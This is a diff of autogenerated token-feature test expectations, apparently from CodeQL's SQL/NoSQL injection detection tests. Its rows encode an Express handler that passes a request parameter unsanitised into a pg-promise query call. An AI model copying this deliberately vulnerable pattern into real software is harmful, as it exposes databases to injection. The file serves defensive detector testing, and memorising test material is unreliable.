autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:18:6:20 | res | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:18:6:20 | res | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:7:9:7:13 | taint | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:7:9:7:13 | taint | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:7:9:7:13 | taint | enclosingFunctionBody | req res taint req params x db one taint res end | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:7:9:7:13 | taint | enclosingFunctionName | onRequest | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:7:9:7:13 | taint | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:7:9:7:28 | taint | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:7:9:7:28 | taint | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:7:9:7:28 | taint | enclosingFunctionBody | req res taint req params x db one taint res end | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:7:9:7:28 | taint | enclosingFunctionName | onRequest | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:7:9:7:28 | taint | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:7:9:7:28 | taint = req.params.x | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:7:9:7:28 | taint = req.params.x | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:7:9:7:28 | taint = req.params.x | enclosingFunctionBody | req res taint req params x db one taint res end | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:7:9:7:28 | taint = req.params.x | enclosingFunctionName | onRequest | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:7:9:7:28 | taint = req.params.x | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:7:17:7:19 | req | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:7:17:7:19 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:7:17:7:19 | req | enclosingFunctionBody | req res taint req params x db one taint res end | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:7:17:7:19 | req | enclosingFunctionName | onRequest | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:7:17:7:19 | req | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:7:17:7:26 | req.params | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:7:17:7:26 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:7:17:7:26 | req.params | enclosingFunctionBody | req res taint req params x db one taint res end | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:7:17:7:26 | req.params | enclosingFunctionName | onRequest | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:7:17:7:26 | req.params | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:7:17:7:28 | req.params.x | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:7:17:7:28 | req.params.x | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:7:17:7:28 | req.params.x | enclosingFunctionBody | req res taint req params x db one taint res end | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:7:17:7:28 | req.params.x | enclosingFunctionName | onRequest | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:7:17:7:28 | req.params.x | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:7:21:7:26 | params | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:7:21:7:26 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:7:21:7:26 | params | enclosingFunctionBody | req res taint req params x db one taint res end | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:7:21:7:26 | params | enclosingFunctionName | onRequest | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:7:21:7:26 | params | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:7:28:7:28 | x | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:7:28:7:28 | x | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:7:28:7:28 | x | enclosingFunctionBody | req res taint req params x db one taint res end | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:7:28:7:28 | x | enclosingFunctionName | onRequest | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:7:28:7:28 | x | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:8:5:8:8 | this | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:8:5:8:8 | this | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:8:5:8:8 | this | enclosingFunctionBody | req res taint req params x db one taint res end | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:8:5:8:8 | this | enclosingFunctionName | onRequest | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:8:5:8:8 | this | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:8:5:8:11 | this.db | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:8:5:8:11 | this.db | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:8:5:8:11 | this.db | enclosingFunctionBody | req res taint req params x db one taint res end | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:8:5:8:11 | this.db | enclosingFunctionName | onRequest | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:8:5:8:11 | this.db | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:8:5:8:15 | this.db.one | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:8:5:8:15 | this.db.one | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:8:5:8:15 | this.db.one | enclosingFunctionBody | req res taint req params x db one taint res end | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:8:5:8:15 | this.db.one | enclosingFunctionName | onRequest | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:8:5:8:15 | this.db.one | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:8:5:8:22 | exceptional return of this.db.one(taint) | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:8:5:8:22 | exceptional return of this.db.one(taint) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:8:5:8:22 | exceptional return of this.db.one(taint) | enclosingFunctionBody | req res taint req params x db one taint res end | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:8:5:8:22 | exceptional return of this.db.one(taint) | enclosingFunctionName | onRequest | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:8:5:8:22 | exceptional return of this.db.one(taint) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:8:5:8:22 | this.db.one(taint) | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:8:5:8:22 | this.db.one(taint) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:8:5:8:22 | this.db.one(taint) | enclosingFunctionBody | req res taint req params x db one taint res end | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:8:5:8:22 | this.db.one(taint) | enclosingFunctionName | onRequest | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:8:5:8:22 | this.db.one(taint) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:8:10:8:11 | db | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:8:10:8:11 | db | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:8:10:8:11 | db | enclosingFunctionBody | req res taint req params x db one taint res end | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:8:10:8:11 | db | enclosingFunctionName | onRequest | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:8:10:8:11 | db | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:8:13:8:15 | one | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:8:13:8:15 | one | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:8:13:8:15 | one | enclosingFunctionBody | req res taint req params x db one taint res end | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:8:13:8:15 | one | enclosingFunctionName | onRequest | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:8:13:8:15 | one | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:8:17:8:21 | taint | CalleeFlexibleAccessPath | this.db.one | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:8:17:8:21 | taint | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:8:17:8:21 | taint | contextFunctionInterfaces | constructor()\nonRequest(req, res) | @@ -3441,48 +17042,330 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:8:17:8:21 | taint | enclosingFunctionBody | req res taint req params x db one taint res end | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:8:17:8:21 | taint | enclosingFunctionName | onRequest | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:8:17:8:21 | taint | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:9:5:9:7 | res | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:9:5:9:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:9:5:9:7 | res | enclosingFunctionBody | req res taint req params x db one taint res end | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:9:5:9:7 | res | enclosingFunctionName | onRequest | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:9:5:9:7 | res | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:9:5:9:11 | res.end | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:9:5:9:11 | res.end | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:9:5:9:11 | res.end | enclosingFunctionBody | req res taint req params x db one taint res end | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:9:5:9:11 | res.end | enclosingFunctionName | onRequest | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:9:5:9:11 | res.end | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:9:5:9:13 | exceptional return of res.end() | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:9:5:9:13 | exceptional return of res.end() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:9:5:9:13 | exceptional return of res.end() | enclosingFunctionBody | req res taint req params x db one taint res end | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:9:5:9:13 | exceptional return of res.end() | enclosingFunctionName | onRequest | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:9:5:9:13 | exceptional return of res.end() | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:9:5:9:13 | res.end() | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:9:5:9:13 | res.end() | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:9:5:9:13 | res.end() | enclosingFunctionBody | req res taint req params x db one taint res end | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:9:5:9:13 | res.end() | enclosingFunctionName | onRequest | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:9:5:9:13 | res.end() | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:9:9:9:11 | end | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:9:9:9:11 | end | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:9:9:9:11 | end | enclosingFunctionBody | req res taint req params x db one taint res end | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:9:9:9:11 | end | enclosingFunctionName | onRequest | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:9:9:9:11 | end | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:1:13:7 | require | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:1:13:7 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:1:13:7 | require | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:1:13:18 | exceptional return of require('express') | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:1:13:18 | exceptional return of require('express') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:1:13:18 | exceptional return of require('express') | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:1:13:18 | require('express') | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:1:13:18 | require('express') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:1:13:18 | require('express') | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:1:13:20 | exceptional return of require('express')() | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:1:13:20 | exceptional return of require('express')() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:1:13:20 | exceptional return of require('express')() | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:1:13:20 | require('express')() | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:1:13:20 | require('express')() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:1:13:20 | require('express')() | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:1:13:24 | require ... )().get | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:1:13:24 | require ... )().get | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:1:13:24 | require ... )().get | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:1:13:77 | exceptional return of require ... , res)) | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:1:13:77 | exceptional return of require ... , res)) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:1:13:77 | exceptional return of require ... , res)) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:1:13:77 | require ... , res)) | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:1:13:77 | require ... , res)) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:1:13:77 | require ... , res)) | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:9:13:17 | 'express' | CalleeFlexibleAccessPath | require | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:9:13:17 | 'express' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:9:13:17 | 'express' | calleeImports | | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:9:13:17 | 'express' | contextFunctionInterfaces | constructor()\nonRequest(req, res) | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:9:13:17 | 'express' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:9:13:17 | 'express' | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:22:13:24 | get | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:22:13:24 | get | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:22:13:24 | get | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:26:13:31 | '/foo' | CalleeFlexibleAccessPath | import(!)().get | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:26:13:31 | '/foo' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:26:13:31 | '/foo' | calleeImports | express | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:26:13:31 | '/foo' | contextFunctionInterfaces | constructor()\nonRequest(req, res) | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:26:13:31 | '/foo' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:26:13:31 | '/foo' | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:34:13:33 | Foo | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:34:13:33 | Foo | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:34:13:33 | Foo | enclosingFunctionBody | req res Foo onRequest req res | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:34:13:33 | Foo | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:34:13:33 | Foo | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:34:13:76 | 'arguments' object of anonymous function | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:34:13:76 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:34:13:76 | 'arguments' object of anonymous function | enclosingFunctionBody | req res Foo onRequest req res | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:34:13:76 | 'arguments' object of anonymous function | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:34:13:76 | 'arguments' object of anonymous function | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:34:13:76 | (req, r ... q, res) | CalleeFlexibleAccessPath | import(!)().get | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:34:13:76 | (req, r ... q, res) | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:34:13:76 | (req, r ... q, res) | calleeImports | express | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:34:13:76 | (req, r ... q, res) | contextFunctionInterfaces | constructor()\nonRequest(req, res) | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:34:13:76 | (req, r ... q, res) | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:34:13:76 | (req, r ... q, res) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:34:13:76 | exceptional return of anonymous function | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:34:13:76 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:34:13:76 | exceptional return of anonymous function | enclosingFunctionBody | req res Foo onRequest req res | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:34:13:76 | exceptional return of anonymous function | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:34:13:76 | exceptional return of anonymous function | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:34:13:76 | return of anonymous function | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:34:13:76 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:34:13:76 | return of anonymous function | enclosingFunctionBody | req res Foo onRequest req res | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:34:13:76 | return of anonymous function | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:34:13:76 | return of anonymous function | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:35:13:37 | req | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:35:13:37 | req | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:35:13:37 | req | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:35:13:37 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:35:13:37 | req | enclosingFunctionBody | req res Foo onRequest req res | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:35:13:37 | req | enclosingFunctionBody | req res Foo onRequest req res | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:35:13:37 | req | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:35:13:37 | req | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:35:13:37 | req | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:35:13:37 | req | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:40:13:42 | res | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:40:13:42 | res | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:40:13:42 | res | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:40:13:42 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:40:13:42 | res | enclosingFunctionBody | req res Foo onRequest req res | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:40:13:42 | res | enclosingFunctionBody | req res Foo onRequest req res | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:40:13:42 | res | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:40:13:42 | res | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:40:13:42 | res | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:40:13:42 | res | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:48:13:56 | exceptional return of new Foo() | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:48:13:56 | exceptional return of new Foo() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:48:13:56 | exceptional return of new Foo() | enclosingFunctionBody | req res Foo onRequest req res | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:48:13:56 | exceptional return of new Foo() | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:48:13:56 | exceptional return of new Foo() | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:48:13:56 | new Foo() | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:48:13:56 | new Foo() | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:48:13:56 | new Foo() | enclosingFunctionBody | req res Foo onRequest req res | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:48:13:56 | new Foo() | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:48:13:56 | new Foo() | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:48:13:66 | new Foo().onRequest | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:48:13:66 | new Foo().onRequest | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:48:13:66 | new Foo().onRequest | enclosingFunctionBody | req res Foo onRequest req res | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:48:13:66 | new Foo().onRequest | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:48:13:66 | new Foo().onRequest | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:48:13:76 | exceptional return of new Foo ... q, res) | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:48:13:76 | exceptional return of new Foo ... q, res) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:48:13:76 | exceptional return of new Foo ... q, res) | enclosingFunctionBody | req res Foo onRequest req res | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:48:13:76 | exceptional return of new Foo ... q, res) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:48:13:76 | exceptional return of new Foo ... q, res) | 